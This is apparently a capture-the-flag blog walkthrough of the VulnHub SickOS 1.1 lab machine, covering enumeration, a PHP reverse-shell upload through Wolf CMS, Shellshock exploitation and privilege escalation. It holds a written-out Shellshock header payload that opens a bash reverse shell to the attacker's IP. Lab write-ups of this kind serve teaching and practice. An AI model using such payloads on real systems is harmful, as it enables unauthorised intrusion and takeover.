Saturday, June 9, 2018

SickOS 1.1


SICKOS 1.1

- Layout for this exercise:




1 - INTRODUCTION

- The goal of this exercise is the study of the hacking process for the vulnerable machine SickOS 1.1

- SickOS 1.1 can be downloaded from here:

https://www.vulnhub.com/entry/sickos-11,132/



- Once downloaded and extracted with WMware:




2 - ENUMERATION

- Using netdiscover let's notice that the only IP address in the local network working with WMware is 192.168.1.15, so it should correspond to the vulnerable machine SickOS 1.1:






- Scanning with Nmap there are 2 ports open: 22 (ssh) and 3128 (Squid http-proxy):




- Configuring the Firefox Connection Settings for the discovered HTTP proxy (192.168.1.15:3128)





- Connecting with the browser:




- Viewing the source there is nothing interesting:




- Let's explore the website structure with dirb:




- Looking at the robots.txt file:




- Exploring the folder /wolfcms:





- Using dirb against wolfcms:




- Looking inside the public folder:





- Using nikto to discover potential vulnerabilities:





- The most remarkable result is that /cgi-bin/status is vulnerable to shellshock vulnerability:





3 - EXPLOITATION

- Let's try two ways to exploit the vulnerable machine.

3.1 - Uploading a webshell

- Googling for Wolf CMS vulnerabilities:









- Going back to /wolfcms we learn that there is an Administrator:



- Reading from the previous description of the vulnerability:




- Let's explore the admin option:





- Trying admin:admin the authentication works:







- Going to the Files tab there is an Upload File function:







- Up to this point, why not to upload a webshell?

- Kali Linux has got some webshells available:




- For instance, let's explore php-reverse-shell.php

- Opening the file we see that there are two parameters that must be changed or adapted to our neeeds (IP and port to connect):







- Copying the webshell to a working folder so that we can manipulate it without losing the original version:






- Opening the webshell and modifying IP and port:







- Now it is ready to be uploaded to the vulnerable machine:
















- We find php-reverse-shell.php at the /public folder:




- Before running it, let's establish a netcat listening session on port 3333:







- Running the webshell:



- The attack is successful, and a limited shell is achieved at the attacker's side:





3.2 - Shellshock

- Now, let's try to exploit the site taking advantage of the shellshock vulnerability

https://metalkey.github.io/shellshock-explained--exploitation-tutorial.html
https://blog.cloudflare.com/inside-shellshock/

- We can check that the cgi script uses bash as interpreter because the path gives us uptime/uname result inside a Json string:




- Setting up a netcat listening session on port 4444:




- Let's craft a command curl to achieve a reverse shell:

https://curl.haxx.se/docs/manpage.html

https://www.surevine.com/shellshocked-a-quick-demo-of-how-easy-it-is-to-exploit/


- The parameters used in this case:
  • - x (proxy) = 192.168.1.15:3128
  • -H (header) = User-Agent ignored; /bin/bash -i>& /dev/tcp/192.168.1.17/4444 0>&1 
  • target = http://192.168.1.15/cgi-bin/status





- A limited shell is achieved at the attacker's side:





4 - PRIVILEGE ESCALATION

- Listing the folder /var/www:




- Listing wolfcms:

















- Opening config.php we find interesting credentials for the user root:




- Trying to use the root credentials to achieve a shell, we find that the current shell does not allow to use the sudo command:




- Importing a tty terminal so that we can run a /bin/bash shell:






- Trying again, su works but the authentication fails:





- Remembering the current user:




- Let's move to another user, for instance sickos:




- Now the authentication is correct:




- Finally a root shell is achieved:




- Also, we could reach to same point by SSH-ing with the sickos user account:







- Surprisingly, sickos is a complete sudoer:








- Also:





5 - CAPTURING THE FLAG

- Reading the flag:




- By the way, the flag's name is an MD5 encryption string:





- Decrypting it results to be bleh!!